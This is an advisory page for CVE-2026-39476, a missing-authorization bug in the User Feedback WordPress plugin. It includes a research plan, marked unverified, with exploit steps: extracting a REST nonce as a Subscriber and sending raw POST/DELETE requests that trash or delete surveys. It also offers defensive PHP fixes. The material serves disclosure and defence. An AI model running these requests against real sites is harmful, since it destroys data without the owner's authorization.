CVE-2026-39476

User Feedback <= 1.10.1 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 1.11.0
Time to patch: 29d

Description

The User Feedback plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.10.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.10.1
Published: March 18, 2026
Last updated: April 15, 2026
Affected plugin: userfeedback-lite

What Changed in the Fix

Changes introduced in v1.11.0


Source Code

WordPress.org SVN
Research Plan
Unverified


Vulnerability Research Plan: CVE-2026-39476 (User Feedback <= 1.10.1 - Missing Authorization)

1. Vulnerability Summary

The User Feedback plugin for WordPress is vulnerable to Missing Authorization in its survey management functionality. The plugin exposes several administrative actions (such as trashing, publishing, or duplicating surveys) via its REST API without verifying if the authenticated user possesses the necessary administrative capabilities (manage_options). This allows any authenticated user, including those with Subscriber level access, to modify or delete surveys created by administrators.

Based on the provided source code in assets/vue/js/chunk-common.js (specifically module 0792), the plugin interacts with a REST API under a namespace (likely userfeedback/v1) to perform these actions.

2. Attack Vector Analysis

  • Endpoint: POST /wp-json/userfeedback/v1/surveys/trash (Inferred from JS function g)
  • HTTP Method: POST
  • Authentication: Required (Subscriber-level or higher)
  • Payload: JSON object containing an array of survey IDs to be trashed.
  • Nonce: A valid WordPress REST API nonce is required in the X-WP-Nonce header.
  • Preconditions: At least one survey must exist in the system for the attacker to target.

3. Code Flow

  1. Entry Point: The REST API endpoint userfeedback/v1/surveys/trash is registered in the backend (likely in a class handling REST routes).
  2. Missing Check: The permission_callback for this route is either missing or uses a weak check like is_user_logged_in() instead of current_user_can('manage_options').
  3. JS Trigger: In assets/vue/js/chunk-common.js, module 0792 defines the survey management functions:
    • g = e => n.post("surveys/trash", { survey_ids: e }) // Trashing
    • h = e => n.delete("surveys", { data: { survey_ids: e } }) // Permanent Delete
    • m = e => n.post("surveys/publish", { survey_ids: e }) // Publishing
  4. Backend Sink: The request reaches the survey controller, which performs database operations on the wp_userfeedback_surveys table (e.g., updating the status column to trash) without verifying the requester's authority.
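The defect described in the code flow is the permission_callback, not the nonce. What a correct registration of the same route looks like is shown below as an added example written for this page; it is not the plugin's own code. The namespace userfeedback/v1, the route surveys/trash and the wp_userfeedback_surveys table are carried over from the research plan, where they are themselves inferred, and every function prefixed example_uf_ is hypothetical.

```php
<?php
/**
 * Added example (not the plugin's own code): registering a REST route for a
 * bulk survey action with a real capability check. Namespace, route and table
 * name are assumptions taken from the research plan; example_uf_* names are
 * hypothetical.
 */

add_action( 'rest_api_init', 'example_uf_register_routes' );

function example_uf_register_routes() {
    register_rest_route( 'userfeedback/v1', '/surveys/trash', array(
        'methods'  => WP_REST_Server::CREATABLE,   // POST
        'callback' => 'example_uf_trash_surveys',

        // The pattern this advisory describes is a permission_callback that is
        // absent ('__return_true') or that only asks whether *somebody* is logged
        // in ('is_user_logged_in'). A Subscriber passes both. The X-WP-Nonce
        // header does not help either: the 'wp_rest' nonce is CSRF protection
        // and proves only that the request came from that user's own session.
        // Authorization is this check and nothing else:
        'permission_callback' => 'example_uf_can_manage_surveys',

        // Declare and sanitize the input so the handler only ever sees integers.
        'args' => array(
            'survey_ids' => array(
                'required'          => true,
                'type'              => 'array',
                'items'             => array( 'type' => 'integer' ),
                'sanitize_callback' => 'example_uf_sanitize_ids',
            ),
        ),
    ) );
}

function example_uf_can_manage_surveys( WP_REST_Request $request ) {
    if ( current_user_can( 'manage_options' ) ) {
        return true;
    }
    // rest_authorization_required_code() yields 401 for anonymous callers
    // and 403 for logged-in users who simply lack the capability.
    return new WP_Error(
        'rest_forbidden',
        'You are not allowed to manage surveys.',
        array( 'status' => rest_authorization_required_code() )
    );
}

function example_uf_sanitize_ids( $ids ) {
    return array_values( array_filter( array_map( 'absint', (array) $ids ) ) );
}

/**
 * Hypothetical handler: moves each survey to the 'trash' status. WordPress
 * never calls it for a request that failed the permission_callback above.
 */
function example_uf_trash_surveys( WP_REST_Request $request ) {
    global $wpdb;
    $table   = $wpdb->prefix . 'userfeedback_surveys';
    $trashed = 0;
    foreach ( $request->get_param( 'survey_ids' ) as $id ) {
        $rows = $wpdb->update(
            $table,
            array( 'status' => 'trash' ),
            array( 'id' => $id ),
            array( '%s' ),
            array( '%d' )
        );
        if ( $rows ) {
            $trashed += (int) $rows;
        }
    }
    return rest_ensure_response( array( 'success' => true, 'trashed' => $trashed ) );
}
```

Two details matter for review. WP_REST_Server runs permission_callback before the route callback, so the capability check is the only thing standing between a Subscriber and the database write; and since WordPress 5.5 a route registered without any permission_callback only triggers a _doing_it_wrong notice, it is still served as a public route, so "missing" and "too weak" have the same effect.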

4. Nonce Acquisition Strategy

The REST API requires a nonce for authenticated requests. The User Feedback plugin localizes its configuration and security tokens into a global JavaScript object.

  1. Identify Localization: The plugin enqueues its admin scripts and localizes data. Based on common patterns in this plugin, the data is likely in window.userfeedback.
  2. Script Loading: The admin scripts load on User Feedback admin pages. A subscriber can access the /wp-admin/ dashboard but may not see the User Feedback menu. However, the script might still be localized.
  3. Extraction:
    • Navigate to /wp-admin/ as a Subscriber.
    • Use browser_eval to extract the nonce:
      browser_eval("window.userfeedback?.nonce || window.userfeedback_common?.nonce")
    • The exact key from localized scripts in this plugin is typically nonce within the userfeedback object.

5. Exploitation Strategy

Step 1: Discover Target Survey ID

The attacker needs the ID of a survey to trash. These can often be found by iterating IDs or checking frontend survey placements.

Step 2: Perform Unauthorized Trash Action

Use the http_request tool to send a POST request to the REST API.

Request:

POST /wp-json/userfeedback/v1/surveys/trash HTTP/1.1
Host: [TARGET_HOST]
X-WP-Nonce: [EXTRACTED_NONCE]
Content-Type: application/json

{
    "survey_ids": [1]
}

Step 3: Alternative - Permanent Deletion

Request:

DELETE /wp-json/userfeedback/v1/surveys HTTP/1.1
Host: [TARGET_HOST]
X-WP-Nonce: [EXTRACTED_NONCE]
Content-Type: application/json

{
    "survey_ids": [1]
}

6. Test Data Setup

  1. Install Plugin: Install User Feedback (userfeedback-lite) version 1.10.1.
  2. Create Survey: As Admin, create a feedback survey.
    • wp userfeedback create_survey --title="Target Survey" --status="publish" (or use the UI).
  3. Create Attacker: Create a user with the Subscriber role.
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  4. Confirm Survey ID:
    • wp db query "SELECT id, title FROM wp_userfeedback_surveys;"

7. Expected Results

  • Response: The server should return a 200 OK or 201 Created status with a JSON body confirming the surveys were processed (e.g., {"success": true}).
  • Database Impact: The record in wp_userfeedback_surveys for the target ID should have its status changed to trash or be removed entirely if the DELETE method was used.

8. Verification Steps

  1. Check Database Status:
    • wp db query "SELECT status FROM wp_userfeedback_surveys WHERE id = [ID]"
    • Successful exploit shows status = 'trash'.
  2. Check UI: Navigate to the User Feedback surveys page as Admin and verify the survey is in the "Trash" tab.

9. Alternative Approaches

If the REST API is not the direct target, the AJAX action identified in assets/vue/js/chunk-common.js module 0792 may be vulnerable:

  • Action: userfeedback_google_sheets_get_auth_url
  • Endpoint: /wp-admin/admin-ajax.php?action=userfeedback_google_sheets_get_auth_url
  • Impact: Unauthorized retrieval of authentication URLs for third-party integrations.

However, the survey modification via surveys/trash represents the most significant "Missing Authorization" impact for survey data integrity.

Research Findings
Static analysis — not yet PoC-verified

Summary

The User Feedback plugin for WordPress (up to version 1.10.1) fails to implement proper authorization checks on its REST API routes for survey management. This allows authenticated users with low-level privileges, such as Subscribers, to trash, delete, publish, or duplicate surveys by sending crafted requests to the plugin's API endpoints.

Vulnerable Code

// assets/vue/js/chunk-common.js - Module 0792 defines interactions with vulnerable REST endpoints
// These mappings correspond to administrative actions performed via the REST API
// (n is an HTTP client object defined elsewhere in the bundle; only the relative paths are shown here)
l = e => n.post("surveys", e).then(e => e.data),                         // create survey
c = e => n.post(`surveys/${e}/duplicate`).then(e => e.data),             // duplicate survey by ID
u = e => n.post("surveys/restore", { survey_ids: e }).then(e => e.data), // restore from trash
d = e => n.post("surveys/draft", { survey_ids: e }).then(e => e.data),   // set to draft
m = e => n.post("surveys/publish", { survey_ids: e }).then(e => e.data), // publish
g = e => n.post("surveys/trash", { survey_ids: e }).then(e => e.data),   // trash
h = e => n.delete("surveys", { data: { survey_ids: e } }).then(e => e.data) // permanent delete

Security Fix

Only in /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.11.0/assets/css: admin-exclusion-banner.css
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.10.1/assets/index.php /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.11.0/assets/index.php
--- /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.10.1/assets/index.php	2023-01-31 17:55:08.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.11.0/assets/index.php	2026-03-11 17:04:32.000000000 +0000
@@ -1,4 +1,8 @@
 <?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
 // Nothing to see here
 
 header( 'HTTP/1.0 403 Forbidden' );
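Review bot: the ABSPATH guard added at the top of assets/index.php calls `exit` before the existing `header( 'HTTP/1.0 403 Forbidden' );` line, so a direct request to this file now returns an empty 200 instead of the 403 that line was sending; either emit the 403 header before `exit` or drop the now-unreachable header call. Note also that this hunk only hardens a placeholder file and is not the capability check the advisory describes: the diff shown on this page is truncated before any change to the REST route registration, so the actual authorization fix cannot be reviewed from what is visible here.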
Only in /home/deploy/wp-safety.org/data/plugin-versions/userfeedback-lite/1.11.0/assets/js: admin-exclusion-banner.js
... (truncated)

Exploit Outline

An attacker with Subscriber-level access can exploit this by first obtaining a valid WordPress REST API nonce, typically found in the localized 'userfeedback' JavaScript object on dashboard pages. By identifying the ID of an existing survey, the attacker can then send an authenticated POST request to '/wp-json/userfeedback/v1/surveys/trash' or a DELETE request to '/wp-json/userfeedback/v1/surveys' with the target survey ID in the 'survey_ids' array. Because the backend fails to verify the user's capabilities (missing manage_options check), the surveys will be trashed or deleted regardless of the attacker's actual permissions.
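Until the update to 1.11.0 is applied, a site can enforce the missing check itself and make attempts visible in its logs. The must-use plugin below is an added example written for this page, not code from the plugin or from wp-safety.org. It assumes the route namespace userfeedback/v1 and the surveys route prefix inferred in the research plan above, uses only standard WordPress hooks, and the example_uf_ function names are hypothetical.

```php
<?php
/**
 * Plugin Name: Example UF REST guard (virtual patch)
 *
 * Added example, not the plugin's own code. Place in wp-content/mu-plugins/
 * on a site still running User Feedback <= 1.10.1. It denies state-changing
 * requests to the plugin's survey routes unless the caller holds
 * manage_options, and logs each denial to the PHP error log. The namespace
 * 'userfeedback/v1' and the 'surveys' prefix are assumptions carried over
 * from the research plan.
 */

add_filter( 'rest_request_before_callbacks', 'example_uf_guard_survey_routes', 10, 3 );

/**
 * Runs after cookie/nonce authentication has established the current user and
 * before the route's own permission_callback and callback are invoked.
 * Returning a WP_Error here short-circuits the request.
 */
function example_uf_guard_survey_routes( $response, $handler, $request ) {
    $route  = $request->get_route();   // e.g. "/userfeedback/v1/surveys/trash"
    $method = $request->get_method();

    if ( ! example_uf_is_mutating_survey_route( $route, $method ) ) {
        return $response;
    }
    if ( current_user_can( 'manage_options' ) ) {
        return $response;
    }

    // Log who, what and from where. The body is deliberately not logged.
    error_log( sprintf(
        'userfeedback-guard: denied %s %s for user #%d from %s',
        $method,
        $route,
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown'
    ) );

    return new WP_Error(
        'rest_forbidden',
        'Survey management requires the manage_options capability.',
        array( 'status' => rest_authorization_required_code() )
    );
}

/**
 * True for requests that can change survey state: any non-GET method on a
 * path at or below /userfeedback/v1/surveys (covers trash, restore, draft,
 * publish, duplicate and the DELETE on the collection itself).
 */
function example_uf_is_mutating_survey_route( $route, $method ) {
    if ( 'GET' === strtoupper( $method ) ) {
        return false;
    }
    return (bool) preg_match( '#^/userfeedback/v1/surveys(?:/|$)#', $route );
}
```

GET requests are deliberately left alone so that any read-only route the front-end survey widget may use keeps working; if the site's administrators find that a legitimate non-GET route under the same prefix is needed by a lower role, narrow the pattern rather than weakening the capability. The log line gives incident responders the user ID and source address of each denied call, which is the signal to look for when deciding whether surveys were modified before the guard was installed.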
